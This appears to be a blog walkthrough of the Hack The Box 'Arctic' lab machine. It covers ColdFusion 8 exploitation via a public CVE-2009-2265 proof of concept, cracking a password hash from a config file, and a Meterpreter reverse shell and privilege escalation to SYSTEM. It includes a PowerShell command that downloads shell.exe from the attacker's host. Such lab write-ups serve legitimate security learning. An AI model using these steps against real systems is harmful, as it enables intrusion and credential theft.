Arctic is an easy Windows machine that involves straightforward exploitation with some minor challenges. The process begins by troubleshooting the web server to identify the correct exploit. Initial access can be gained either through an unauthenticated file upload in Adobe ColdFusion. Once a shell is obtained, privilege escalation is achieved using the MS10-059 exploit.
- Let’s spawn the machine ….
# Enumeration
- let’s start with a nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(kali㉿kali)-[~/Desktop/HTB/Arctic]
└─$ nmap -sC -sV -p- 10.10.10.11 --min-rate=2000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 22:51 EDT
Nmap scan report for 10.10.10.11
Host is up (0.27s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.06 seconds
|
- multiple ports are open RPC (135, 49154) , but i found port 8500 with directory listing
- after looking around different directories , i found
ADOBE COLDFUSION 8 Application login page , installed on the endpoint
1
| http://10.10.10.11:8500/CFID/administrator
|
- then i search for the CVE and related poc to this software version and i found one …
1
| https://github.com/0xDTC/Adobe-ColdFusion-8-RCE-CVE-2009-2265
|
# Initial Access
- then i git clone the repo
1
| git clone https://github.com/0xDTC/Adobe-ColdFusion-8-RCE-CVE-2009-2265
|
- and then change to the POC directory and run the exploit , where
-l <LHOST> Local attacker IP (e.g., 10.10.16.5)”-p <LPORT> Local attacker port for listener (e.g., 9001)”-r <RHOST> Remote target IP (e.g., 10.10.10.11)”-q <RPORT> Remote target port (ColdFusion) (e.g., 8500)”
- and got the reverse shell
- then i grab the user flag from the Desktop directory of user
tolis
- after the for privilege escalation , and looking around and found some password in the
password.properties file
1
| dir C:\ColdFusion8\ /s /b | findstr password.properties
|
- then search this hash on the crackstation and luckyly got the cracked password as
happyday
- Then i think of metasploit for privilege escalation for easy win , before that i generate
shell.exe file to get the reverse shell on our meterpreter listner …
- then we start the python3 server to host this file ..
- now we run this setup the meterpreter listner
1
2
3
4
| msf6 auxiliary(scanner/http/coldfusion_locale_traversal) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
|
- and then we run this command on the inital reverse shell we got …
1
2
3
| powershell "(new-object
System.Net.WebClient).Downloadfile('http://10.10.14.11:8000/shell.exe',
'shell.exe')"
|
- and after executing this command we got the meterpreter shell
# Privilege Escalation
- then we migrate our shell to a process running on x64 , for this we first list the running processes
- then we run this command
migrate [PID]
- after that we run the
locate exploit suggestor module to look for vulnerability for privilege escalation …
- then we pick one exploit module for which this much is vulnerable and set the options , and hit exploit
- and then we got another meterpreter session which we got as
NT AUTHORITY\SYSTEM
# Final Thoughts
I hope this blog continues to be helpful in your learning journey!. If you find this blog helpful, I’d love to hear your thoughts ; my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning!. You can contact me on Linkedin and Twitter
linkdin
Twitter
